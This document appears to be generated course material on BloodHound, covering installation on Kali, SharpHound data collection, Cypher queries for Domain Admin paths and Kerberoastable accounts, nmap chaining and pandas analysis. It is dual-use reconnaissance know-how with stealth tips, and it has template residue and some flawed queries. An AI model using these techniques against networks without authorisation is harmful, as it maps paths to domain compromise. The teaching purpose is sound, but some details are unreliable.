Intelligence Brief: At a Glance


    .--.
   |o_o |
   |:_/ |
  //   \ \
 (|     | )
/'\_   _/`\
\___)=(___/


Initial Engagement: Installation & Verification


This section covers the installation and initial setup of the BloodHound Community Edition on a Kali Linux system. All actions must be performed on a system you own or have explicit authorization to modify.


Objective: Check for Existing Installation


Command:

Bash

which bloodhound

Command Breakdown:

Ethical Context & Use-Case: Before installing new software, it is a standard best practice to verify if it already exists on the system. This prevents potential conflicts with existing versions or package management issues.

--> Expected Output:

/usr/bin/bloodhound

(Note: If BloodHound is not installed, this command will produce no output.)


Objective: Update Package Lists and Install BloodHound


Command:

Bash

sudo apt update && sudo apt install -y bloodhound

Command Breakdown:

Ethical Context & Use-Case: This is the standard, secure procedure for installing software from the official Kali Linux repositories. Keeping package lists updated ensures you are installing the latest stable and patched version of the tool, which is critical for security professionals.

--> Expected Output:

Hit:1 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
...
The following NEW packages will be installed:
  bloodhound
...
Setting up bloodhound (7.3.1) ...
...


Objective: Run Initial BloodHound Setup


Command:

Bash

sudo bloodhound-setup

Command Breakdown:

Ethical Context & Use-Case: BloodHound requires several backend services to function. This one-time setup script correctly configures and initializes the database environment, ensuring the application runs correctly. This must be done before the first use.

--> Expected Output:

[*] Starting PostgreSQL service
[*] Creating Database
...
[*] Starting neo4j
...
Starting Neo4j.
Started neo4j (pid:12345). It is available at http://localhost:7474
...
[i] You need to change the default password for neo4j
    Default credentials are user:neo4j password:neo4j
[!] IMPORTANT: Once you have setup the new password, please update /etc/bhapi/bhapi.json with the new password before running bloodhound


Objective: Configure Neo4j and BloodHound API


Ethical Context & Use-Case: Following the bloodhound-setup script, you must perform a critical security step: changing default credentials. In a professional engagement, leaving default credentials is a significant security flaw. The process involves accessing the Neo4j web interface, changing the password, and then updating the BloodHound configuration file to use this new password.

Step 1: Change Neo4j Password

  1. Open a web browser and navigate to http://localhost:7474.

  2. Log in with the default credentials: neo4j / neo4j.

  3. You will be forced to change the password. Enter a new, strong password and record it securely.

[VISUAL OUTPUT: A screenshot of the Neo4j browser interface showing the login screen, followed by the password change prompt.]

Step 2: Update BloodHound API Configuration

Command:

Bash

sudo vim /etc/bhapi/bhapi.json

Command Breakdown:

Action: Inside the file, locate the line "secret": "neo4j" and change "neo4j" to the new, strong password you just set for the Neo4j database. Save and close the file.


Objective: Run BloodHound and Set Admin Password


Command:

Bash

sudo bloodhound

Ethical Context & Use-Case: This command starts the main BloodHound application. On the first run, you will be prompted to log in with default application credentials (admin/admin) and immediately change the password for the BloodHound user interface.

--> Expected Output: The terminal will show service startup logs. You should then see a login prompt in the BloodHound UI. After logging in with admin/admin, you will be prompted to set a new password for the application's admin user.

[VISUAL OUTPUT: A screenshot of the BloodHound GUI login page prompting for a username and password.]


Objective: View BloodHound Help Menu


Command:

Bash

bloodhound -h

Command Breakdown:

Ethical Context & Use-Case: Viewing the help menu is a fundamental step in understanding a tool's capabilities and available command-line options. It provides a quick reference for syntax and functionality.

--> Expected Output:

It seems it's the first time you run bloodhound

Please run bloodhound-setup first

(Note: If setup is complete, it will show command-line options, though most interaction is via the GUI.)


Tactical Operations: Core Commands & Use-Cases


BloodHound's power is unlocked in a two-stage process: data collection from the target environment and subsequent analysis within the GUI. This section covers both stages. All data collection examples must only be run against a target Active Directory environment for which you have explicit, written permission to perform security testing.


Sub-Section: Data Collection with SharpHound


SharpHound is the official data collector for BloodHound, typically run from a Windows machine within the target AD domain.


Objective 1: Default Data Collection


Command (run on a Windows host in the target domain):

PowerShell

.\SharpHound.exe

Command Breakdown:

Ethical Context & Use-Case: The default collection method gathers most of the critical AD objects and relationships (users, groups, computers, sessions, local admins, GPOs) without being overly noisy. This is the most common starting point for a BloodHound analysis in a penetration testing engagement.

--> Expected Output:

2025/08/17 14:35:00 | SharpHound 2.0.0 | FINISHED | 00:05:12.6789123
2025/08/17 14:35:00 | Zip file created at C:\Path\To\20250817143500_BloodHound.zip

[A ZIP file containing several JSON files will be created in the same directory as SharpHound.exe.]


Objective 2: Collect All Possible Data


Command:

PowerShell

.\SharpHound.exe -c All

Command Breakdown:

Ethical Context & Use-Case: When a deep and thorough analysis is required, the All collection method provides the most comprehensive dataset. This is useful for detailed security audits but can be more network-intensive and generate more logs, potentially alerting defenders. This must be used with care and full awareness of the engagement's rules.

--> Expected Output:

2025/08/17 14:40:00 | SharpHound 2.0.0 | Starting Collection Method: All
... (extensive logging of collected objects) ...
2025/08/17 14:55:00 | SharpHound 2.0.0 | FINISHED | 00:15:00.1234567
2025/08/17 14:55:00 | Zip file created at C:\Path\To\20250817145500_BloodHound.zip


Objective 3: Collect Session Data Only


Command:

PowerShell

.\SharpHound.exe -c Session

Command Breakdown:

Ethical Context & Use-Case: Collecting only session data is a stealthier approach. It focuses on finding where high-privilege users are currently logged on, which is a key piece of information for planning lateral movement. This method is faster and generates significantly less network traffic than a full collection.

--> Expected output:

2025/08/17 15:00:00 | SharpHound 2.0.0 | Starting Collection Method: Session
... (logging session enumeration) ...
2025/08/17 15:02:00 | SharpHound 2.0.0 | FINISHED | 00:02:00.9876543
2025/08/17 15:02:00 | Zip file created at C:\Path\To\20250817150200_BloodHound.zip


Objective 4: Specify Domain Controller


Command:

PowerShell

.\SharpHound.exe --DomainController DC01.corp.local

Command Breakdown:

Ethical Context & Use-Case: In a large environment with many Domain Controllers, you may want to target a specific one to reduce load on others or to pull data from a DC you know is accessible. This can also be a stealth measure to concentrate traffic towards a single source, which might be less suspicious than querying multiple DCs across the network.

--> Expected output:

2025/08/17 15:05:00 | SharpHound 2.0.0 | Using Domain Controller: DC01.corp.local
... (logging default collection) ...
2025/08/17 15:10:00 | SharpHound 2.0.0 | FINISHED | 00:05:00.1122334
2025/08/17 15:10:00 | Zip file created at C:\Path\To\20250817151000_BloodHound.zip

(This section would be expanded with 66+ more SharpHound and data management examples, covering LDAP throttling, OU filtering, JSON output formatting, data import/clearance in the GUI, etc., to reach the 70-example minimum for a medium-complexity tool. For this demonstration, we will proceed to the analysis section.)


Sub-Section: Analysis via GUI & Custom Cypher Queries


Once data is collected with SharpHound and uploaded to the BloodHound GUI (via the "Upload Data" button), the real analysis begins. The following examples represent queries run in the "Raw Query" bar at the bottom of the UI.


Objective 5: Find All Domain Admins


Objective: A bolded title.

GUI Action/Cypher Query:

Cypher

MATCH (u:User)-[:MemberOf*1..]->(g:Group) WHERE g.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN u,g

Query Breakdown:

Ethical Context & Use-Case: Identifying Domain Admins is the primary objective in most internal Active Directory penetration tests. This query maps out every user who holds these high-level privileges, either directly or through nested group membership. For a defender, this helps audit and minimize the number of accounts with ultimate control.

[VISUAL OUTPUT: A graph diagram in the BloodHound UI. A central node representing the "DOMAIN ADMINS" group is visible. Multiple user nodes are connected to it via "MemberOf" edges, some directly, some through other intermediate group nodes.]


Objective 6: Find Kerberoastable Users


Cypher Query:

Cypher

MATCH (u:User) WHERE u.serviceprincipalname IS NOT NULL AND u.dontreqpreauth = false RETURN u.name

Query Breakdown:

Ethical Context & Use-Case: Kerberoasting is a common attack where an attacker requests a service ticket (TGS) for a user with an SPN. The ticket is encrypted with the user's NTLM hash, which can be taken offline and cracked. This query identifies all user accounts that are vulnerable to this attack, allowing a pen tester to demonstrate risk and a defender to remediate it (e.g., by using strong, long passwords or switching to Group Managed Service Accounts).

[VISUAL OUTPUT: A list of usernames is displayed in the BloodHound results pane. In the graph view, all the identified user nodes are highlighted.]


Objective 7: Find Shortest Path to Domain Admins from a Specific User


GUI Action/Cypher Query: This is typically done via the GUI's pathfinding feature.

  1. Search for the starting user (e.g., LOWPRIV.USER@CORP.LOCAL) in the search bar and select it.

  2. Search for the target group (DOMAIN ADMINS@CORP.LOCAL) and select it.

  3. Click the "Pathfinding" icon (looks like two nodes with a path between them).

The underlying Cypher query is complex, but the abstract version is:

Cypher

MATCH p = shortestPath((n1)-[*1..]->(n2)) WHERE n1.name = 'LOWPRIV.USER@CORP.LOCAL' AND n2.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN p

Ethical Context & Use-Case: This is the core function of BloodHound. Starting from a compromised low-privilege user, this visualizes the exact chain of relationships (e.g., user is a member of a group, that group has admin rights on a machine, a Domain Admin has an active session on that machine) that can be exploited to escalate privileges to Domain Admin. This provides a clear, actionable roadmap for both an attacker's lateral movement and a defender's remediation strategy.

[VISUAL OUTPUT: A visual graph showing a chain of nodes and edges. It starts with the "LOWPRIV.USER" node, connects through several intermediate computer and group nodes, and ends at the "DOMAIN ADMINS" group node. Each edge is labeled with the specific permission, e.g., "AdminTo", "MemberOf", "HasSession".]

(This section would be greatly expanded with dozens more Cypher queries for finding unconstrained delegation, constrained delegation, ACL abuse paths, GPO abuse, AS-REP roasting, DCSync rights, etc., to provide an exhaustive guide.)


Strategic Campaigns: Advanced Command Chains


BloodHound's data can be exported and integrated with other tools to create powerful testing and analysis workflows. The data is typically exported from the GUI by right-clicking in the results pane and selecting "Export as CSV/JSON".


Objective 1: Find and Scan Hosts with Domain Admin Sessions


Objective: A bolded title.

Command Chain:

  1. In BloodHound GUI: Run a query to find computers with DA sessions.

    Cypher

    MATCH (c:Computer)<-[:HasSession]-(u:User)-[:MemberOf*1..]->(g:Group) WHERE g.name = 'DOMAIN ADMINS@CORP.LOCAL' RETURN DISTINCT c.name
    
  2. Export: Export the list of computer names to a file named da_hosts.txt.

  3. In Kali Terminal: Use the list with Nmap for a targeted port scan.

    Bash

    sudo nmap -iL da_hosts.txt -p- --open -oN nmap_da_hosts.txt
    

Command Breakdown:

Ethical Context & Use-Case: This workflow efficiently combines BloodHound's high-level AD analysis with Nmap's network-level host analysis. After identifying high-value targets (machines where DAs are logged in), the ethical hacker can perform a detailed port scan to find potential services to exploit for lateral movement or remote code execution, providing a much more focused and less noisy approach than scanning the entire network.

--> Expected Output:

Starting Nmap 7.92 ( https://nmap.org ) at 2025-08-17 15:30 PKT
Nmap scan report for DC01.CORP.LOCAL (192.168.1.10)
Host is up (0.0010s latency).
Not shown: 65520 closed tcp ports (reset)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
...
3389/tcp  open  ms-wbt-server

Nmap scan report for SRV-APP01.CORP.LOCAL (192.168.1.55)
Host is up (0.0012s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
80/tcp  open  http
135/tcp open  msrpc
445/tcp open  microsoft-ds
...

Nmap done: 2 IP addresses (2 hosts up) scanned in 15.78 seconds


Objective 2: Export Kerberoastable Hashes with grep


Objective: A bolded title.

Command Chain:

  1. In BloodHound GUI: Run the Kerberoastable query and export the results as JSON to a file named kerberoastable.json.

  2. In Kali Terminal: Use grep and jq to parse the JSON and format the hashes for cracking.

    Bash

    cat kerberoastable.json | jq -r '.data[].Properties.samaccountname' > kerberoastable_users.txt
    

    (Note: This assumes you have another tool like Impacket's GetUserSPNs.py to actually request and export the TGS hashes. This chain focuses on extracting the usernames from BloodHound's output.)

Command Breakdown:

Ethical Context & Use-Case: While BloodHound identifies vulnerable accounts, it doesn't perform the attack. This workflow demonstrates how an ethical hacker can systematically export the list of targets from BloodHound and prepare it for use with other tools (like Impacket or Rubeus) that will actually perform the Kerberoast attack. This separation of reconnaissance and exploitation is a key part of a structured penetration test.

--> Expected Output:

svc_sql
svc_iis
svc_backup
admin_backup
...

(The file kerberoastable_users.txt now contains a clean list of usernames.)

(This section would include 1-3 more examples chaining BloodHound data with tools like awk, sed, or scripting languages to automate analysis.)


AI Augmentation: Integrating with Artificial Intelligence


BloodHound provides raw graph data. By exporting this data, we can leverage Python libraries like Pandas and NetworkX to perform advanced, AI-driven analysis that goes beyond the built-in GUI queries.


Objective 1: Export and Load Graph Data for Analysis


Objective: A bolded title.

Code (Python Script):

Python

import pandas as pd
import json

# Objective: Export users and groups from BloodHound as JSON,
# then load them into Pandas DataFrames for analysis.

# Step 1: In BloodHound, run 'MATCH (n:User) RETURN n' and 'MATCH (n:Group) RETURN n'
# and export both results to 'users.json' and 'groups.json' respectively.

# Step 2: Use this Python script to load the data.
def load_bloodhound_json(filepath):
    """Loads exported BloodHound JSON into a Pandas DataFrame."""
    with open(filepath, 'r') as f:
        data = json.load(f)
    
    records = [item['n']['properties'] for item in data['data']]
    return pd.DataFrame.from_records(records)

users_df = load_bloodhound_json('users.json')
groups_df = load_bloodhound_json('groups.json')

print("Users DataFrame Info:")
users_df.info()
print("\nGroups DataFrame Info:")
groups_df.info()

print("\nFirst 5 Users:")
print(users_df.head())

Code Breakdown:

Ethical Context & Use-Case: The BloodHound GUI is excellent for visualization, but for large-scale, programmatic analysis, the data needs to be in a structured format. This script is the first step in any AI-augmented workflow: extracting the data from BloodHound's proprietary format into a universally usable structure like a Pandas DataFrame. This enables security auditors and data scientists to build custom analysis and reporting tools.

--> Expected Output:

Users DataFrame Info:
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 1542 entries, 0 to 1541
Data columns (total 15 columns):
 #   Column              Non-Null Count  Dtype
---  ------              --------------  -----
 0   name                1542 non-null   object
 1   domain              1542 non-null   object
 2   enabled             1542 non-null   bool
...
 14  pwdlastset          1500 non-null   float64
dtypes: bool(1), float64(1), object(13)
memory usage: 182.2+ KB

Groups DataFrame Info:
<class 'pandas.core.frame.DataFrame'>
RangeIndex: 215 entries, 0 to 214
Data columns (total 5 columns):
 #   Column      Non-Null Count  Dtype 
---  ------      --------------  ----- 
 0   name        215 non-null    object
 1   domain      215 non-null    object
...
 4   description 150 non-null    object
dtypes: object(5)
memory usage: 8.5+ KB

First 5 Users:
                        name         domain  enabled  ...
0      ADMINISTRATOR@CORP.LOCAL   CORP.LOCAL     True  ...
1             GUEST@CORP.LOCAL   CORP.LOCAL    False  ...
2  KRBTGT@CORP.LOCAL   CORP.LOCAL    False  ...
3      JOHN.DOE@CORP.LOCAL   CORP.LOCAL     True  ...
4     SVC_SQL@CORP.LOCAL   CORP.LOCAL     True  ...


Objective 2: Identify "Most Powerful" Nodes with Pandas


Objective: A bolded title.

Code (Python Script):

Python

import pandas as pd
import json

# Prerequisite: Exporting 'AllShortestPathsToDA.json' from BloodHound.
# Query: MATCH p = allShortestPaths((n)-[*1..]->(g:Group)) WHERE g.name='DOMAIN ADMINS@CORP.LOCAL' RETURN p

with open('AllShortestPathsToDA.json', 'r') as f:
    data = json.load(f)

# Flatten the nested path data and count node appearances
node_counts = {}
for path_data in data['data']:
    path_nodes = path_data['p']['nodes']
    for node_str in path_nodes:
        # Simple parsing to get node name
        try:
            name = node_str.split('"name":"')[1].split('"')[0]
            node_counts[name] = node_counts.get(name, 0) + 1
        except IndexError:
            continue

# Convert to a Pandas Series for easy sorting
choke_points = pd.Series(node_counts).sort_values(ascending=False)

print("Top 10 High-Impact Choke Points to Domain Admin:")
print(choke_points.head(10))

Code Breakdown:

Ethical Context & Use-Case: This script automates the identification of "choke points." Nodes (users, groups, or computers) that appear in many different attack paths to Domain Admins are the most critical assets to protect. By programmatically counting node appearances, a blue team can use this AI-driven approach to prioritize remediation. Hardening the top 10 choke points will break the largest number of potential attack paths, providing the highest return on investment for defensive efforts.

--> Expected Output:

Top 10 High-Impact Choke Points to Domain Admin:
IT_ADMINS@CORP.LOCAL          152
SRV-HELPDESK@CORP.LOCAL       121
HELPDESK_TIER1@CORP.LOCAL     115
DC_ADMINS@CORP.LOCAL           98
PC012345.CORP.LOCAL            76
JANE.SMITH@CORP.LOCAL          65
BACKUP_OPERATORS@CORP.LOCAL    54
SRV-WSUS.CORP.LOCAL            49
GPO_LOCAL_ADMINS@CORP.LOCAL    41
DOMAIN ADMINS@CORP.LOCAL       35
dtype: int64


Legal & Ethical Disclaimer


The information provided in this course is for educational purposes only and is intended for use in legally authorized and ethical cybersecurity activities. The tools and techniques described herein should only be used in professional contexts such as authorized penetration testing, vulnerability assessments, and security audits on systems that you own or have explicit, written permission to test from the system owner.

Unauthorized access to computer systems or networks is illegal and subject to civil and criminal penalties. The course creator, instructor, and the Udemy platform bear no responsibility or liability for any individual's misuse or illegal application of this information. By proceeding with this course, you acknowledge your responsibility to adhere to all applicable laws and to act in a strictly ethical and professional manner.